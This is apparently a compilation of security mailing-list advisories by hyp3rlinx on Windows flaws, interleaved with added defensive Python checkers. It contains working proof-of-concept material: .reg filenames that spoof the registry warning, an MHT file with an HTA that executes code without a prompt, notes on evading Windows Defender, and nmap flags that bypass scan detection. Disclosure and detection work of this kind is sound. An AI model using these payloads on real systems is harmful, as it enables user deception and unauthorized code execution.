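        t = text.lower()
        if 'activexobject' in t and 'wscript.shell' in t:
            tags.append('hex_encoded_wscript_shell')
    return tags


if __name__ == '__main__':
    for c in SAMPLE_CMDLINES:
        print(classify_cmdline(c) or ['-'], c)
    print(scan_scriptlet(SAMPLE_SCRIPTLET), decode_hex_literals(SAMPLE_SCRIPTLET))
```

Matching on the normalized form is what makes the rule survive the next variant: an attacker can add a fourth ..\ or split the URL into more pieces, but rundll32 still has to receive javascript:, mshtml and RunHTMLApplication, and GetObject still has to see script: once the pieces are joined.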


[FD] Microsoft Windows .Reg File Dialog Spoof / Mitigation Bypass

2022-01-11 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

A file with the .reg file extension is a Registration file used by the
Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be
produced by the Windows registry when backing up parts of the
registry.


[Vulnerability Type]
Windows .Reg File Dialog Spoof - Mitigation Bypass


[CVE Reference]
N/A

[Security Issue]
Back in 2019 I disclosed a novel way to spoof the Windows registry
dialog warning box to display an attacker controlled message.
This spoofing flaw lets us spoof the "Are you sure you want to
continue?" warning message to instead read "Click Yes to abort" or
whatever else an attacker would like to display.

This flaw can potentially make users think they are canceling the
registry import when they are in fact importing it, as we can make the
registry security warning dialog box LIE to them as the warning
messages are now under an attacker's control.

The way it works is using a specially crafted .Reg filename, this
allows control of the registry warning dialog message presented to an
end user.

Recently, in 2022, I noticed the .Reg file dialog spoof no longer works on
Windows 10, but instead triggers an access violation in Regedit.exe.
Therefore, something has changed in the OS, possibly a silent mitigation,
hmmm. Wouldn't be the first time: back in 2016 my msinfo32.exe .NFO file XXE
injection vulnerability report had a similar fate, fixed with no CVE or
bulletin, and that one allowed remote file access data theft.

In a threatpost.com interview in 2019, Microsoft stated "The issue
submitted does not meet the severity bar for servicing via a security
update".
Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711

However, the "fix" is easily bypassed and the old payload can still be
made to work across systems.

Bypassing .Reg spoofing fix was only the start, I had to find ways to
bypass two different Windows Defender detections along the way for the
PoC.

Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A=2147744426

Lets begin...

My original .Reg file spoofing payload of 2019, now triggers an access
violation and crashes regedit.exe from invalid pointer read.

7FFE7A4A7C83 | EB 0D           | jmp ntdll.7FFE7A4A7C92      |
7FFE7A4A7C85 | FF C9           | dec ecx                     | ;This loops thru to read in the path + filename
7FFE7A4A7C87 | 66 45 39 5D 00  | cmp word ptr ds:[r13],r11w  | ;ACCESS VIOLATION HERE
7FFE7A4A7C8C | 74 08           | je ntdll.7FFE7A4A7C96       | ;Move the string down two bytes
7FFE7A4A7C8E | 49 83 C5 02     | add r13,2                   | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
7FFE7A4A7C92 | 85 C9           | test ecx,ecx                |

7FFE7A4A7C87 | 66 45 39 5D 00  | cmp word ptr ds:[r13],r11w  | ; BOOM ACCESS VIOLATION on Win10, but not Win7

ntdll!woutput_l+0x387:
7ffe`7a4a7c87 6645395d00  cmp word ptr [r13],r11w  ds:01ed`=


Online search shows Win-7 still makes up about 22% of the world's
computers, so I asked my friend, security researcher Eduardo Braun Prado
(Edu_Braun_0day), to help me re-test the .REG file spoof on Windows 7 for
completeness. Turns out my original payload still works on Win-7 and, with
minor tweaks, on Win-10.

Original works on Win-7, but crashes regedit.exe on Win-10:
Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg

Original payload (first mitigation bypass), works on Win-7/Win-10:
Remove the second-to-last byte (%1) before the %0 string terminator and the
%b characters.
Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg

New payload mitigation bypass works on both Win-7 and Win-10:
Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg

However, we are NOT done yet as we must deal with Windows Defender
detection preventions.

1) Trojan:Win32/Powessere.G
2) Backdoor:JS/Relvelshe.A

Bypassing "Trojan:Win32/Powessere.G"
====================================
Two components required to defeat Trojan:Win32/Powessere.G detection
in Windows Defender.

A) extra path traversal when referencing mshtml ..\\..\\..\\
B) concatenation when constructing the remote se
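
The three filenames above behave like FormatMessage format strings: %n breaks the line, %b is a space, %0 ends the message so the real "Are you sure you want to continue?" question never appears, an undocumented letter after % is output without the %, and %1 asks for an insert argument that nothing supplies, which is consistent with the invalid pointer read in the dump. The renderer below is an added example, not the post's code: it applies the documented FormatMessage escape rules to each filename so the spoofed prompt and the crash-prone %1 can be seen without running regedit. That regedit formats the path this way is an inference from the behaviour the post describes, not something the post states, and the prompt text around the filename is a constructed stand-in except for its final sentence.

```python
import re
from typing import List, Sequence, Tuple

# The three filenames quoted in the post.
PAYLOADS = [
    "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg",
    "Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg",
    "Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg",
]

# Constructed stand-in for the import prompt: only the final question is the
# post's wording. Assumption: the path is substituted first and the whole string
# is then processed with FormatMessage escape rules.
PROMPT_TEMPLATE = (
    "If you do not trust the source of this information in {path}, "
    "do not add it to the registry.\n\nAre you sure you want to continue?"
)

# Documented FormatMessage escapes: %n line break, %r carriage return, %t tab,
# %b space, %. period, %! exclamation mark, %% percent sign. %0 ends the message,
# %1..%99 insert an argument, and any other non-digit after % is output as-is
# without the %.
ESCAPES = {"n": "\r\n", "r": "\r", "t": "\t", "b": " ", ".": ".", "!": "!", "%": "%"}
INSERT_REF = re.compile(r"[1-9][0-9]?")


def render(message: str, inserts: Sequence[str] = ()) -> Tuple[str, List[str]]:
    """Apply the escape rules and collect what the escapes did: 'line_break',
    'truncated' (a %0 cut the rest off) and 'insert_without_argument' (a %1..%99
    with nothing to insert, the case the post's Windows 10 crash dump shows)."""
    out: List[str] = []
    findings: List[str] = []

    def note(tag: str) -> None:
        if tag not in findings:
            findings.append(tag)

    i = 0
    while i < len(message):
        ch = message[i]
        if ch != "%" or i + 1 >= len(message):
            out.append(ch)
            i += 1
            continue
        nxt = message[i + 1]
        if nxt == "0":
            note("truncated")
            break
        m = INSERT_REF.match(message, i + 1)
        if m:
            n = int(m.group())
            if n <= len(inserts):
                out.append(inserts[n - 1])
            else:
                note("insert_without_argument")
            i += 1 + len(m.group())
            continue
        if nxt in ("n", "r"):
            note("line_break")
        out.append(ESCAPES.get(nxt, nxt))
        i += 2
    return "".join(out), findings


def analyze_reg_filename(name: str) -> Tuple[str, List[str]]:
    """Prompt text a user would see for this .reg filename, plus the findings."""
    return render(PROMPT_TEMPLATE.format(path=name))


if __name__ == "__main__":
    for p in PAYLOADS:
        text, tags = analyze_reg_filename(p)
        print(tags)
        print(text)
        print("-" * 40)
```

For a mail gateway or EDR rule the interesting findings are the last two: a %0 anywhere in a .reg filename cuts the genuine warning off, and a bare %1..%99 has no legitimate reason to be in a filename at all.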

[FD] Microsoft Internet Explorer / ActiveX Control Security Bypass

2021-12-07 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer (MSIE)
Internet Explorer is a discontinued series of graphical web browsers
developed by Microsoft and included in the Microsoft Windows line of
operating systems, starting in 1995.


[Vulnerability Type]
ActiveX Control Security Bypass


[CVE Reference]
N/A


[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer
ActiveX control warnings as well as popup blocker privacy settings are
not enforced.
This can allow the execution of ActiveX content with zero warning to
an unsuspecting end user and or force them to visit arbitrary attacker
controlled websites.

By default when opening browser associated files that contain active
content, MSIE restricts scripts from running without explicit user
interaction and permission.
Instead end users are presented with a yellow warning bar on the
browsers webpage, asking first if they wish to allow the running of
blocked content.
This prevents execution of active content scripts or controls without
the user first clicking the "Allow blocked content" warning bar.

However, specially crafted MHT files residing on disk that contain an
invalid header directive suppress ActiveX warnings and Popup blocker
privacy settings.
Therefore, to bypass Internet Explorer "active content" blocking, the file
needs to contain a Content-Location header using an arbitrary named value,
e.g.

"Content-Location: PBARBAR"

Note, oftentimes MHT files are set to open in IE by default, and IE, while
discontinued, is still present on the Windows OS.
Tested successfully on Windows 10 latest fully patched version with
default IE security settings.

Expected result: ActiveX control security warning, prevention of code
execution and blocking browser popup windows.
Actual result: No ActiveX control code execution blocking, security
warnings or browser window popup blocking enforcement.

[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.

[Exploit/POC]
Change [VICTIM] value below to a specified user for testing.

1) Create the MHT PoC file.

"MSIE_ActiveX_Control_Security_Bypass.mht"

From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"
This is a multi-part message in MIME format.


--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
</head>
<body>
<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv
.hta', 'pop',
args)
pop.moveTo(2000,2000)
</script>
</body>
</html>
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--


2) Create the PoC HTA file.

"Sales_Report_2021.csv
.hta"

<html>
<head>
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>
</head>
</html>

3) Open the MHT file locally.


[Network Access]
Local


[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk


[Disclosure Timeline]
Vendor Notification:  May 13, 2019
MSRC : July 2, 2019
"We determined that a fix for this issue will be considered in a
future version of this product or service.
At this time, we will not be providing ongoing updates of the status
of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

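
The bypass hinges on one header in one MIME part, so an MHT file can be triaged by parsing it as the multipart message it is rather than by grepping for strings. The checker below is an added example, not code from the post: it walks the parts with Python's email parser and reports a Content-Location that is not a URL, any inline script in the HTML part, and any reference to an .hta file. Both MHT inputs are constructed; the first follows the shape of the PoC above (the [VICTIM] placeholder is the post's own), the second is an ordinary saved page with a proper URL.

```python
import email
import re
from typing import List
from urllib.parse import urlparse

BOUNDARY = "=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"

# Constructed MHT that follows the shape of the post's PoC: one text/html part,
# a Content-Location that is just a token, and script that opens an .hta whose
# name hides the extension behind whitespace. [VICTIM] is the post's placeholder.
POC_MHT = f"""MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="{BOUNDARY}"

This is a multi-part message in MIME format.

--{BOUNDARY}
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<html><body><script>
var pop = window.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv      .hta', 'pop', 'height=1,width=1')
pop.moveTo(2000,2000)
</script></body></html>
--{BOUNDARY}--
"""

# Constructed ordinary saved page: a real URL in Content-Location, no script.
BENIGN_MHT = f"""MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="{BOUNDARY}"

--{BOUNDARY}
Content-Type: text/html; charset="UTF-8"
Content-Location: http://www.example.com/report.html

<html><body><p>Quarterly numbers</p></body></html>
--{BOUNDARY}--
"""

SCRIPT_TAG = re.compile(r"<script\b", re.I)
HTA_REF = re.compile(r"\.hta\b", re.I)


def audit_mht(raw: str) -> List[str]:
    """Walk the MIME parts of an MHT file and report the traits the post ties to
    the bypass: a Content-Location that is not a URL at all, plus active content
    in the HTML part and any reference to an .hta file."""
    findings: List[str] = []
    msg = email.message_from_string(raw)
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        ctype = part.get_content_type()
        location = (part.get("Content-Location") or "").strip()
        if location and not urlparse(location).scheme:
            findings.append(f"{ctype}: Content-Location is not a URL ({location})")
        if ctype == "text/html":
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            if SCRIPT_TAG.search(body):
                findings.append(f"{ctype}: contains inline script")
            if HTA_REF.search(body):
                findings.append(f"{ctype}: references an .hta file")
    return findings


if __name__ == "__main__":
    print(audit_mht(POC_MHT))
    print(audit_mht(BENIGN_MHT))
```

A saved web page always carries the URL it was saved from in Content-Location, so a bare token there is a useful signal on its own; the script and .hta checks are what turn it into a finding worth acting on.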


[FD] Windows NT Command-line Interpreter "cmd.exe" - Stack Buffer Overflow / PoC Video

2021-09-21 Thread hyp3rlinx
https://www.youtube.com/watch?v=wYYgjV-PzD8



[FD] Windows NT Command-line Interpreter "cmd.exe" / Stack Buffer Overflow

2021-09-21 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx, malvuln)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
cmd.exe is the default command-line interpreter for the OS/2,
eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows
CE family), and ReactOS operating systems.


[Vulnerability Type]
Stack Buffer Overflow


[CVE Reference]
N/A


[Security Issue]
A specially crafted payload will trigger a stack buffer overflow in the
Windows NT "cmd.exe" command-line interpreter. It requires running an
already dangerous file type like .cmd or .bat. However, when cmd.exe
accepts arguments using the /c or /k flags, which execute commands
specified by a string, that will also trigger the buffer overflow condition.

E.g. cmd.exe /c .


[Memory Dump]
(660.12d4): Stack buffer overflow - code c409 (first/second chance
not available)
ntdll!ZwWaitForMultipleObjects+0x14:
7ffb`00a809d4 c3  ret

0:000> .ecxr
rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0
rdx=7ff7c0e64534 rsi=200e rdi=200c
rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0
 r8=200c  r9=7ff7c0e60520 r10=
r11= r12=02e34d77a810 r13=0002
r14=02e34d796890 r15=200d
iopl=0 nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0202
cmd!StripQuotes+0xa8:
7ff7`c0e214f8 cc  int 3

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
cmd!StripQuotes+a8
7ff7`c0e214f8 cc  int 3

EXCEPTION_RECORD:   -- (.exr 0x)
ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8)
   ExceptionCode: c409 (Stack buffer overflow)
  ExceptionFlags: 0001
NumberParameters: 1
   Parameter[0]: 0008

PROCESS_NAME:  cmd.exe

ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of
a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun
of a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

EXCEPTION_PARAMETER1:  0008

MOD_LIST: 

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  12d4

BUGCHECK_STR:  
APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 7ffafcfca9c6 to 7ffb00a809d4

STACK_TEXT:
00f6`a82fea38 7ffa`fcfca9c6 : `
` ` ` :
ntdll!ZwWaitForMultipleObjects+0x14
00f6`a82fea40 7ffa`fcfca8ae : `0098
`0096 `d22d `d22d :
KERNELBASE!WaitForMultipleObjectsEx+0x106
00f6`a82fed40 7ffa`fe1d190e : `
00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 :
KERNELBASE!WaitForMultipleObjects+0xe
00f6`a82fed80 7ffa`fe1d150f : `
` `0003 `0001 :
kernel32!WerpReportFaultInternal+0x3ce
00f6`a82feea0 7ffa`fd05976b : `
00f6`a82ff1d0 `0004 ` :
kernel32!WerpReportFault+0x73
00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000
7ff7`c0e3e000 `200e `200c :
KERNELBASE!UnhandledExceptionFilter+0x35b
00f6`a82feff0 7ff7`c0e26df6 : 02e3`
7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c :
cmd!_raise_securityfailure+0x1a
00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810
` `0002 `200e :
cmd!_report_rangecheckfailure+0xf2
00f6`a82ff0a0 7ff7`c0e2096f : `200c
00f6`a82ff1d0 00f6`a82ff1d0 `200e :
cmd!StripQuotes+0xa8
00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90
02e3`4d76ff90 ` 02e3`4d76ff90 :
cmd!SearchForExecutable+0x443
00f6`a82ff390 7ff7`c0e1fb9e : `
02e3`4d76ff90 ` 02e3`4d99 :
cmd!ECWork+0x69
00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0
02e3`4d76ff90 0

[FD] Microsoft Windows Command-line Interpreter "cmd.exe" / Stack Buffer Overflow

2021-09-17 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx, malvuln)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
cmd.exe is the default command-line interpreter for the OS/2,
eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows
CE family), and ReactOS operating systems.


[Vulnerability Type]
Stack Buffer Overflow


[CVE Reference]
N/A


[Security Issue]
A specially crafted payload will trigger a stack buffer overflow in the
Windows NT "cmd.exe" command-line interpreter. It requires running an
already dangerous file type like .cmd or .bat. However, when cmd.exe
accepts arguments using the /c or /k flags, which execute commands
specified by a string, that will also trigger the buffer overflow condition.

E.g. cmd.exe /c .


[Memory Dump]
(660.12d4): Stack buffer overflow - code c409 (first/second chance
not available)
ntdll!ZwWaitForMultipleObjects+0x14:
7ffb`00a809d4 c3  ret

0:000> .ecxr
rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0
rdx=7ff7c0e64534 rsi=200e rdi=200c
rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0
 r8=200c  r9=7ff7c0e60520 r10=
r11= r12=02e34d77a810 r13=0002
r14=02e34d796890 r15=200d
iopl=0 nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0202
cmd!StripQuotes+0xa8:
7ff7`c0e214f8 cc  int 3

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
cmd!StripQuotes+a8
7ff7`c0e214f8 cc  int 3

EXCEPTION_RECORD:   -- (.exr 0x)
ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8)
   ExceptionCode: c409 (Stack buffer overflow)
  ExceptionFlags: 0001
NumberParameters: 1
   Parameter[0]: 0008

PROCESS_NAME:  cmd.exe

ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of
a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun
of a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

EXCEPTION_PARAMETER1:  0008

MOD_LIST: 

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  12d4

BUGCHECK_STR:  
APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 7ffafcfca9c6 to 7ffb00a809d4

STACK_TEXT:
00f6`a82fea38 7ffa`fcfca9c6 : `
` ` ` :
ntdll!ZwWaitForMultipleObjects+0x14
00f6`a82fea40 7ffa`fcfca8ae : `0098
`0096 `d22d `d22d :
KERNELBASE!WaitForMultipleObjectsEx+0x106
00f6`a82fed40 7ffa`fe1d190e : `
00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 :
KERNELBASE!WaitForMultipleObjects+0xe
00f6`a82fed80 7ffa`fe1d150f : `
` `0003 `0001 :
kernel32!WerpReportFaultInternal+0x3ce
00f6`a82feea0 7ffa`fd05976b : `
00f6`a82ff1d0 `0004 ` :
kernel32!WerpReportFault+0x73
00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000
7ff7`c0e3e000 `200e `200c :
KERNELBASE!UnhandledExceptionFilter+0x35b
00f6`a82feff0 7ff7`c0e26df6 : 02e3`
7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c :
cmd!_raise_securityfailure+0x1a
00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810
` `0002 `200e :
cmd!_report_rangecheckfailure+0xf2
00f6`a82ff0a0 7ff7`c0e2096f : `200c
00f6`a82ff1d0 00f6`a82ff1d0 `200e :
cmd!StripQuotes+0xa8
00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90
02e3`4d76ff90 ` 02e3`4d76ff90 :
cmd!SearchForExecutable+0x443
00f6`a82ff390 7ff7`c0e1fb9e : `
02e3`4d76ff90 ` 02e3`4d99 :
cmd!ECWork+0x69
00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0
02e3`4d76ff90 0

[FD] Recon-Informer v1.3 - Intel for offensive systems anti-reconnaissance (nmap) tool

2021-02-16 Thread hyp3rlinx
# -*- coding: utf-8 -*-
import logging,os,ctypes,sys,argparse,time,re
from subprocess import *
from datetime import datetime
from pkgutil import iter_modules
import pkg_resources

#ReconInformer v1.3 Copyright (c) MIT License
#By John Page (aka hyp3rlinx)
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#apparition...@gmail.com
#PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
#==
#Feb 15, 2021
#v1.3 added: using -t flag we can process packets from a specific inbound IP address of interest.
#v1.3 added timestamp for the detection results in console output window.
#v1.3 fix: utf-8 directive, for encoding error encountered in some older versions of Python.
#v1.3 fix: check for where window size is not relevant for UDP packets to prevent errors.
#v1.3 removed: script name in console window title to view CL arguments.
#v1.3 suppressed: output for fragmented packets that don't show any useful info.
#For best realtime console output call ReconInformer using python -u ReconInformer.py ...
#
#Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive
#security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
#
#Purpose:
#Recon-Informer is NOT meant for protecting public facing or LAN critical enterprise systems whatsoever.
#Its purpose is to detect possible recon against our attacker system on a LAN to provide us defensive intel.
#Therefore, this script is most useful for basic short-term defensive visibility.
#
#Features:
#Attempt to detect and identify typical port scans generated using Nmap including scan type.
#-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
#
#FYI, scans such as FIN don't work well on Windows OS and firewalls can make scans return incorrect results.
#XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
#NULL is another type that doesn't work well on Windows.
#
#However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS
#it's run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
#With -s flag you can add extra scan types to detect that otherwise would be ignored.
#
#PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
#Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you
#will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
#requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag.
#
#ICMP
#Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping.
#
#BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS.
#Firewall rules for blocks are in-bound "ANY" but still allow out-bound.
#FW rules are named like ReconInformer_.
#
#DELETE FW RULE -d  to remove FW rules for blocked hosts.
#
#WHITELIST -w HOST-IP(s) you never want to block on.
#
#FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOS 137 etc.
#ignore packets destined for specific ports to try to reduce false positive probe alerts.
#
#IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS
#from SMB connected shares to try to reduce false positives.
#
#LOG -l flag, default size limit for writing to disk is 1MB.
#
#UDP protocol is ignored by default to try to reduce false positives from sources like NetBIOS, SNMP etc.
#To detect UDP scans use the -u flag, then can also combine with -f port filter
#(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
#
#PCAP saving -s flag, default size limit is also 1MB.
#
#RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect.
#
#Private Network range:
#Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored.
#
#BYPASS examples --scanflags and custom packet window sizes:
#Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
#
#These scans can bypass Recon-Informer and correctly report open ports found.
#nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
#nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
#
#Therefore, I accounted for some of these in Recon-Informer to report these detections.
#
#SCANFLAGS
#nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
#nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
#nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothing useful returned)
#nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
#nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
#
#The above scanflag examples, would have bypassed detection if we didn't
ch

[FD] NtFileSins v2.2 / Windows NTFS Privileged File Access Enumeration Tool (Python v3)

2020-11-10 Thread hyp3rlinx
from subprocess import Popen, PIPE
import sys,argparse,re

#MIT License
#Copyright (c) 2020 John Page (aka hyp3rlinx)
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:

#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.

#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.

#Permission is also explicitly given for insertion in vulnerability databases and similar,
#provided that due credit is given to the author John Page (aka hyp3rlinx).
#
#
# NtFileSins v2.2 (c)
# By John Page (aka hyp3rlinx)
# Python v3 compatible
# Enhancements: search target user dir on first pass, unless the -d flag is used, added .dat, .tmp file ext checks.
# TODO: Alternate Data Streams (ADS) check e.g. abc.txt:test.txt:$DATA
